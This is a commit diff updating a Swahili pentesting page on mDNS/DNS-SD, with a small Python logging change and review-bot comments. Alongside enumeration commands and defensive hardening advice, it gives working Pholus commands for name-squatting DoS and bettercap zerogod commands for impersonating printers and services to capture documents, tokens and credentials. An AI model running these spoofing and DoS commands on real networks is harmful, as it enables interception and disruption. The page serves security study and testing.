Translated ['src/network-services-pentesting/5353-udp-multicast-dns-mdns

Translator 2025-08-20 14:17:08 +00:00
parent 8213bd5bd8
commit 167f92c8b1
2 changed files with 121 additions and 29 deletions

View File

@ -65,7 +65,7 @@ def ref(matchobj):
dir = path.dirname(current_chapter['source_path'])
rel_path = path.normpath(path.join(dir,href))
try:
logger.debug(f'Error getting chapter title: {href} trying with relative path {rel_path}')
logger.debug(f'Not found chapter title from: {href} -- trying with relative path {rel_path}')
if "#" in href:
chapter, _path = findtitle(path.normpath(path.join(dir,href.split('#')[0])), book, "source_path")
title = " ".join(href.split("#")[1].split("-")).title()
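Review bot: the reworded message `logger.debug(f'Not found chapter title from: {href} -- trying with relative path {rel_path}')` is emitted at the top of the `try:` block, before `findtitle(...)` has actually been retried with `rel_path`, so it announces a result where the code is only stating an intent; phrase it as "Chapter title not found for {href}; retrying with relative path {rel_path}" or move the "not found" wording into the `except` branch that handles the failed retry. Minor: `dir` shadows the Python builtin; `chapter_dir` would read more clearly.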

View File

@ -2,52 +2,142 @@
{{#include ../banners/hacktricks-training.md}}
## **Taarifa za Msingi**
## Taarifa za Msingi
**Multicast DNS (mDNS)** inaruhusu **operesheni kama za DNS** ndani ya mitandao ya ndani bila kuhitaji seva ya jadi ya DNS. Inafanya kazi kwenye **UDP port 5353** na inaruhusu vifaa kugundua kila mmoja na huduma zao, ambayo mara nyingi inaonekana katika vifaa mbalimbali vya IoT. **DNS Service Discovery (DNS-SD)**, ambayo mara nyingi hutumika pamoja na mDNS, inasaidia katika kubaini huduma zinazopatikana kwenye mtandao kupitia maswali ya kawaida ya DNS.
Multicast DNS (mDNS) inaruhusu ufumbuzi wa majina kama DNS na ugunduzi wa huduma ndani ya kiungo cha ndani bila seva ya unicast DNS. Inatumia UDP/5353 na anwani za multicast 224.0.0.251 (IPv4) na FF02::FB (IPv6). Ugunduzi wa Huduma za DNS (DNS-SD, kwa kawaida hutumika na mDNS) unatoa njia iliyo sanifishwa ya kuorodhesha na kuelezea huduma kupitia rekodi za PTR, SRV na TXT.
```
PORT STATE SERVICE
5353/udp open zeroconf
```
### **Uendeshaji wa mDNS**
Key protocol details youll often leverage during attacks:
- Majina katika eneo la .local yanatatuliwa kupitia mDNS.
- QU (Query Unicast) bit inaweza kuomba majibu ya unicast hata kwa maswali ya multicast.
- Utekelezaji unapaswa kupuuza pakiti zisizo na chanzo kutoka kwa kiungo cha ndani; baadhi ya stacks bado zinakubali hizo.
- Kuchunguza/kutangaza kunalazimisha majina ya kipekee ya mwenyeji/huduma; kuingilia hapa kunaweza kuunda hali za DoS/“name squatting”.
Katika mazingira yasiyo na seva ya DNS ya kawaida, mDNS inaruhusu vifaa kutatua majina ya kikoa yanayomalizika na **.local** kwa kuuliza anwani ya multicast **224.0.0.251** (IPv4) au **FF02::FB** (IPv6). Vipengele muhimu vya mDNS ni pamoja na thamani ya **Time-to-Live (TTL)** inayonyesha uhalali wa rekodi na **QU bit** inayotofautisha kati ya maswali ya unicast na multicast. Kwa upande wa usalama, ni muhimu kwa utekelezaji wa mDNS kuthibitisha kwamba anwani ya chanzo ya pakiti inalingana na subnet ya ndani.
## DNS-SD service model
### **Uendeshaji wa DNS-SD**
Huduma zinatambulishwa kama _<service>._tcp au _<service>._udp chini ya .local, kwa mfano _ipp._tcp.local (printa), _airplay._tcp.local (AirPlay), _adb._tcp.local (Android Debug Bridge), n.k. Gundua aina kwa _services._dns-sd._udp.local, kisha tatua mifano iliyogunduliwa kwa SRV/TXT/A/AAAA.
DNS-SD inarahisisha ugunduzi wa huduma za mtandao kwa kuuliza rekodi za pointer (PTR) ambazo zinachora aina za huduma kwa mifano yao. Huduma zinatambulishwa kwa kutumia muundo wa **\_\<Service>.\_tcp au \_\<Service>.\_udp** ndani ya kikoa cha **.local**, na kusababisha ugunduzi wa rekodi zinazolingana za **SRV** na **TXT** ambazo zinatoa maelezo ya kina kuhusu huduma.
## Network Exploration and Enumeration
### **Uchunguzi wa Mtandao**
#### **Matumizi ya nmap**
Amri inayofaa kwa ajili ya skanning mtandao wa ndani kwa huduma za mDNS ni:
- nmap target scan (direct mDNS on a host):
```bash
nmap -Pn -sUC -p5353 [target IP address]
nmap -sU -p 5353 --script=dns-service-discovery <target>
```
Amri hii husaidia kubaini bandari za mDNS zilizo wazi na huduma zinazotangazwa juu yao.
#### **Uhesabu wa Mtandao kwa kutumia Pholus**
Ili kutuma maombi ya mDNS kwa shughuli na kukamata trafiki, chombo cha **Pholus** kinaweza kutumika kama ifuatavyo:
- nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
```bash
sudo python3 pholus3.py [network interface] -rq -stimeout 10
sudo nmap --script=broadcast-dns-service-discovery
```
## Mashambulizi
### **Kunutia mDNS Probing**
Njia ya shambulio inahusisha kutuma majibu ya uongo kwa mDNS probes, ikionyesha kwamba majina yote yanayowezekana tayari yanatumika, hivyo kuzuia vifaa vipya kuchagua jina la kipekee. Hii inaweza kufanywa kwa kutumia:
- avahi-browse (Linux):
```bash
sudo python pholus.py [network interface] -afre -stimeout 1000
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
```
- Apple dns-sd (macOS):
```bash
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
```
- Packet capture with tshark:
```bash
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
```
Teknolojia hii inazuia vifaa vipya kujiandikisha huduma zao kwenye mtandao.
**Kwa muhtasari**, kuelewa jinsi mDNS na DNS-SD zinavyofanya kazi ni muhimu kwa usimamizi wa mtandao na usalama. Zana kama **nmap** na **Pholus** hutoa maarifa muhimu kuhusu huduma za mtandao wa ndani, wakati ufahamu wa hatari zinazoweza kutokea husaidia katika kulinda dhidi ya mashambulizi.
Tip: Baadhi ya vivinjari/WebRTC hutumia majina ya mDNS ya muda mfupi kuficha IP za ndani. Ikiwa unaona wagombea random-UUID.local kwenye waya, watatue kwa mDNS ili kuhamasisha IP za ndani.
### Spoofing/MitM
## Attacks
Shambulio la kuvutia zaidi ambalo unaweza kutekeleza kupitia huduma hii ni kufanya **MitM** katika **mawasiliano kati ya mteja na seva halisi**. Unaweza kuwa na uwezo wa kupata faili nyeti (MitM mawasiliano na printer) au hata akidi (uthibitishaji wa Windows).\
### mDNS name probing interference (DoS / name squatting)
Wakati wa awamu ya kuchunguza, mwenyeji anachunguza upekee wa jina. Kujibu kwa migongano ya kudanganya kunalazimisha kuchagua majina mapya au kushindwa. Hii inaweza kuchelewesha au kuzuia usajili wa huduma na ugunduzi.
Example with Pholus:
```bash
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
```
### Huduma za kudanganya na kujifanya (MitM)
Jifanya kama huduma za DNS-SD zinazotangazwa (printa, AirPlay, HTTP, kushiriki faili) ili kuwashawishi wateja kuungana na wewe. Hii ni muhimu hasa kwa:
- Kukamata hati kwa kudanganya _ipp._tcp au _printer._tcp.
- Kuwavutia wateja kwenye huduma za HTTP/HTTPS ili kukusanya tokens/cookies au kupeleka payloads.
- Kuunganisha na mbinu za NTLM relay wakati wateja wa Windows wanaposhughulikia uthibitisho kwa huduma zilizodanganywa.
Kwa moduli ya zerogod ya bettercap (mDNS/DNS-SD spoofer/impersonator):
```bash
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
```
Pia angalia LLMNR/NBNS/mDNS/WPAD spoofing na workflows za kukamata/kuhamasisha akidi:
{{#ref}}
../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
{{#endref}}
### Maelezo kuhusu masuala ya utekelezaji wa hivi karibuni (yenye manufaa kwa DoS/kuendelea wakati wa ushirikiano)
- Avahi reachable-assertion na D-Bus crash bugs (2023) zinaweza kumaliza avahi-daemon kwenye usambazaji wa Linux (e.g. CVE-2023-38469..38473, CVE-2023-1981), kuharibu ugunduzi wa huduma kwenye mwenyeji wa lengo hadi upya.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (2024, CVE-2024-20303) inaruhusu washambuliaji wa karibu kuendesha CPU kubwa na kuunganisha APs. Ikiwa unakutana na mDNS gateway kati ya VLANs, kuwa makini na utulivu wake chini ya mDNS isiyo sahihi au ya kiwango cha juu.
## Maoni ya kujihami na OPSEC
- Mipaka ya segment: Usiruhusu 224.0.0.251/FF02::FB kati ya maeneo ya usalama isipokuwa mDNS gateway inahitajika wazi. Ikiwa lazima uunganishe ugunduzi, pendelea orodha za ruhusa na mipaka ya kiwango.
- Windows endpoints/servers:
- Ili kuzima kabisa ufafanuzi wa majina kupitia mDNS weka thamani ya rejista na upya:
```
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
```
- Katika mazingira yanayosimamiwa, zima sheria ya Windows Defender Firewall ya “mDNS (UDP-In)” (angalau kwenye profaili ya Domain) ili kuzuia usindikaji wa mDNS wa ndani huku ukihifadhi kazi za nyumbani/kuhamahama.
- Kwenye toleo jipya la Windows 11/GPO templates, tumia sera “Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol” na uweke kuwa Disabled.
- Linux (Avahi):
- Funga kuchapisha wakati sio muhimu: weka `disable-publishing=yes`, na punguza interfaces kwa `allow-interfaces=` / `deny-interfaces=` katika `/etc/avahi/avahi-daemon.conf`.
- Fikiria `check-response-ttl=yes` na epuka `enable-reflector=yes` isipokuwa inahitajika kwa dharura; pendelea `reflect-filters=` orodha za ruhusa unaporeflect.
- macOS: Punguza mDNS ya ndani kwenye moto wa mwenyeji/mtandao wakati ugunduzi wa Bonjour hauhitajiki kwa subnet maalum.
- Ufuatiliaji: Onya juu ya ongezeko la kawaida katika maswali ya `_services._dns-sd._udp.local` au mabadiliko ya ghafla katika SRV/TXT za huduma muhimu; hizi ni dalili za spoofing au uigaji wa huduma.
## Kumbukumbu ya haraka ya zana
- nmap NSE: `dns-service-discovery` na `broadcast-dns-service-discovery`.
- Pholus: skana hai, mzunguko wa nyuma wa mDNS, DoS na wasaidizi wa spoofing.
```bash
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
```
- bettercap zerogod: gundua, hifadhi, tangaza, na uigize huduma za mDNS/DNS-SD (angalia mifano hapo juu).
## Spoofing/MitM
Shambulio la kuvutia zaidi ambalo unaweza kufanya juu ya huduma hii ni kufanya MitM katika mawasiliano kati ya mteja na seva halisi. Unaweza kuwa na uwezo wa kupata faili nyeti (MitM mawasiliano na printer) au hata akidi (uthibitisho wa Windows).\
Kwa maelezo zaidi angalia:
{{#ref}}
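Review bot: several strings in the new Swahili body were left in English or carry encoding damage and should be translated consistently before merge: `Key protocol details youll often leverage during attacks:` (the apostrophe in "you'll" was lost), the headings `## DNS-SD service model`, `## Network Exploration and Enumeration` and `## Attacks`, and the lead-in `Example with Pholus:`. The same hunk also leaves two near-duplicate sections, `### Spoofing/MitM` under the attacks heading and a second `## Spoofing/MitM` after the tool reference, both opening with the same paragraph; keep one and let the `{{#ref}}` block follow it. Finally, the registry snippet `HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)` sits in an untagged fence while every other block in the file is tagged `bash`; tag it (for example `text`) so the renderer does not guess a language.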
@ -57,5 +147,7 @@ Kwa maelezo zaidi angalia:
## Marejeleo
- [Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things](https://books.google.co.uk/books/about/Practical_IoT_Hacking.html?id=GbYEEAAAQBAJ&redir_esc=y)
- [Nmap NSE: broadcast-dns-service-discovery](https://nmap.org/nsedoc/scripts/broadcast-dns-service-discovery.html)
- [bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)](https://www.bettercap.org/modules/ethernet/zerogod/)
{{#include ../banners/hacktricks-training.md}}
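Review bot: the body added in this commit cites specific advisories (the Avahi 2023 CVE range and Cisco CVE-2024-20303 for the IOS XE mDNS gateway DoS) but the `## Marejeleo` list only gains the Nmap NSE and bettercap zerogod links; add the corresponding vendor advisory or NVD entries so those claims are traceable from the references section, consistent with how the other sources on the page are cited.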